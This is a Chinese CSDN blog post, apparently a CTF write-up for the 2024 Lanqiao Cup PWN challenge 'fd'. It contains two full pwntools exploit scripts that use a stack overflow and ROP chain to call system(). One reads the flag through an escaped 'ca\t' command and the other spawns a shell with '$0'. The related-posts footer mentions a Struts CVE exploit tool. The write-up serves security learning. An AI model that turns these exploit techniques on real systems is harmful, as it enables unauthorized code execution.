[蓝桥杯2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)

已于 2024-04-29 22:42:01 修改
阅读量650 收藏 1
点赞数 3
分类专栏: PWN 文章标签: 蓝桥杯 数据库 sqlserver 网络安全 安全
于 2024-04-27 17:57:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/138254187
版权

查看保护

查看ida

这里有一次栈溢出,并且题目给了我们system函数。

这里的知识点没有那么复杂

方法一(命令转义):

完整exp:

from pwn import*
p=process('./pwn')
pop_rdi=0x400933
info=0x601090
system=0x400778

payload=b"ca\\t flag 1>&2"
print(len(payload))
payload=payload.ljust(0xe,b'\x00')
p.sendafter(b'restricted stack.',payload)
payload=b'a'*0x28+p64(pop_rdi)+p64(info)+p64(system)
p.sendafter(b'...',payload)
p.interactive()

#补充点1:在第一种方法里,这里的\\是转义符,它所占的字节数并不是2个

payload=b"cat flag 1>&2"

payload=b"c\at flag 1>&2"

payload=b"c\\at flag 1>&2"

所以在这里\\只占一个字节的位置,刚好达到输入上限

方法二(利用system('$0')):

完整exp:

from pwn import*
p=process('./pwn')
pop_rdi=0x400933
info=0x601090
system=0x400778

payload=b"$0\x00"
payload=payload.ljust(0xe,b'\x00')
p.sendafter(b'restricted stack.',payload)
payload=b'a'*0x28+p64(pop_rdi)+p64(info)+p64(system)
p.sendafter(b'...',payload)
p.interactive()

获得权限之后再输入exec 1>&2进行重定向就可以正常拿flag了

clxhzg
关注
专栏目录
超神之路之PWN训练之1之fd
xwjqqqq的博客
12-05 408
环境搭建:拷的学长的ubuntu虚拟机,直接拿过来用了。 训练网址为http://pwnable.kr/play.php。  点开fd,可以看到需通过SSH连接到远程终端做题,命令如下:ssh fd@pwnable.kr -p2222,密码:guest,连接好以后如下图。 通过ls命令可以看到有三个文件,再用ls -al查看文件权限,发现fdfd.c文件都只有读的权限fdfd.
pwnfd
jxz_dz的博客
10-24 690
最近小伙伴发现了一个学习pwn的网站:http://www.pwnable.kr/。然后想着一块进行,把做过的都记 录下来。那么开始第一个吧! pwn学习的游戏网站 1.点一下fd图片出现: 观察ssh fd@pwnable.kr -p2222(pw:guest),是一条ssh命令。ssh是secure shell通常...
day5——system($0)
m0_73858054的博客
12-01 100
所以,无论是用哪种方式,最终达到的目的都是通过shell来执行特定的命令。但需要注意的是,在某些情况下,我怀疑ret那句话不能加的原因就是在这里,但是我不理解因为加上那句话之后payload的长度刚好满足0x38,很明显没有超过…这是因为两者都会调用系统的shell来执行参数中指定的命令。做这道题的时候他那个read限制读入的长度给我整麻了,虽然这里没啥影响,但是后面还是要注意一下。但是没有‘/bin/sh’字串,不过在上面名为tips的函数中发现了$0的机器码。哎呀,昨天居然忘了发了,今天先发一下吧。
pwn学习fd
why笑的博客
07-19 367
查看题目 play平台 Mommy! what is a file descriptor in Linux? try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu.be/971eZhMHQQw 看到题目蒙蔽的很,还好下面给了一个ssh的链接和账号可以直接链接查看(这里就不放出来了,大家可以去官网查看哟!) 尝试 链接上ssh之后就可以
ret2text(system($0))
最新发布
2302_79899078的博客
03-15 888
在正常的编程或系统使用中,system($0)本身并不会直接导致获取任何权限。$0是一个特殊的 shell 变量,它代表当前脚本或程序的名字。在 C 语言中,如果你使用system()函数来执行一个 shell 命令,那么传递给system()的字串会被当作 shell 命令来执行。如果你尝试执行system($0),你实际上是在尝试执行一个名为当前脚本或程序名字的 shell 命令。这通常没有特殊的权限提升效果,除非该名字恰好指向了一个具有特殊权限的脚本或程序。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来...
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /home/ctf/flag Hint 计算器本身功能完善了吗? 关注协议本身 backdoor了解一下 Attachment calc.rar ...
browser-pwn:针对浏览器开发的资源的更新集合
02-25
浏览器拥有 浏览器世界由4个主要参与者主导: Chrome/Chrome(闪烁引擎) Firefox(壁虎引擎) Safari(WebKit-Engine) Edge(闪烁引擎(以前的EdgeHTML-Engine)) 以下分为两部分: 有助于了解其架构和实施...
PWN fd [pwnable.kr]CTF writeup题解系列1
重新启程
01-01 510
题目地址:http://pwnable.kr/play.php 题目地址页面,看看还是挺有意思的,还有一些图片。 看看题目: 题目比较简单,直接把解题过程列出来 root@mypwn:/ctf/work/reverse# ssh fd@pwnable.kr -p2222 The authenticity of host '[pwnable.kr]:2222 ([128.61.24...
pwnable学习笔记-fd
网安星空
12-19 1479
pwn靶场,可供对pwn有兴趣的人和pwn初级人员练手
PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 3797
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
乱七八糟的pwn入门(二)——1.fd
Z_Pathon的博客
08-06 700
审题 环境配好了,要开始做第一道题了,好激动。让我们打开pwnable.kr,看第一道题。 第一题的题目如下: 小学养成的好习惯,先审题。可以看到,题目上问,linux的“file descriptor”是啥? 是啥?俺也不知道,俺也不想问。这个时候先查资料有点无聊,又看到最下面给了一行命令: ssh fd@pwnable.kr -p2222 ...
pwn学习:pwnable.kr fd
Richard_pl的博客
03-11 437
Day 1: Study pwn via pwnable.kr——fd 写在前面: 记录自己的学习过程,从零开始。。。 首先ssh连接远程主机 查看文件相关权限 从第一个文件可以看出,文件由fd_pwn所有,同属于fd组。字节大小为7322,创建时间Jun 11 2014(看来已经创建好久了。。),文件名fd。 最重要的就是文件的访问权限了,-r-sr-x–表示文件所有者拥有读文件的权限,f...
bugku pwn4 学习
欢迎来到神林的博客
08-27 1221
2019-08-25 bugku pwn4 学习 1.拿到题目先file 一下文件看看文件属性 查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容 看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read 想办法利用read 函数5.查看read函数栈中内容 完全能够...
ctf-pwn-堆-调试
xy_369的博客
05-20 490
写这篇文章的目的是更好地去理解堆,不要只停留在理论知识阶段注:读这篇文章需要一定基础,不然读起来很费劲或读不懂,要是有ctf-pwn手的基本基础,只是缺乏堆这一块的知识,可以先把这篇文章读完,大致了解哪些地方写了哪些知识点,同时结合一些堆相关的链接去快速掌握堆在计算机内存中的运作方式。
[GFCTF 2021]where_is_shell
沈理大学牲的博客
11-13 483
在ROP攻击中,攻击者利用程序中存在的这种gadget,通过精心构造的数据将程序控制流引导到这个gadget,从而实现对程序行为的控制。通常情况下,攻击者会将需要的参数放置在栈上,然后利用ROP链将控制流引导到 "pop rdi;ret" 这样的gadget,将参数加载到合适的寄存器中,然后再执行调用目标函数的ret指令。在x86_64架构中,这个gadget的作用是从栈中弹出一个数值,并将其赋值给RDI寄存器,然后进行返回。先覆盖到地址,然后执行ret,ret用来返回弹出的地址,然后执行pop_rdi;
PWN简单栈溢出漏洞获取shell
SkYe's Blog
08-13 2815
PWN简单栈溢出漏洞获取shell 题目来源 下载链接(密码akcz) CTF的时候需要的是获取系统shell,然后通过shell去拿到flag。 条件所限,那我们就先将程序放本地。也就是本地机也充当远程服务器角色 1. 运行程序、查看文件类型、保护措施 程序输出一段应该是内存地址的16位字串;接着要求我们输入,之后就结束运行程序。 程序为32位动态链接的ELF文件 可以看到NX保护关...
SQLmap命令详解:利用udf提权与MSSQL获取shell
文中列举了SQLmap的一些关键命令,包括检查DBA权限、启动数据库shell、执行操作系统命令、读写文件以及尝试权限提升等。此外,还提到了在MSSQL环境下的一些特定操作,如通过lib_mysqludf_sys.dll创建函数执行命令,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值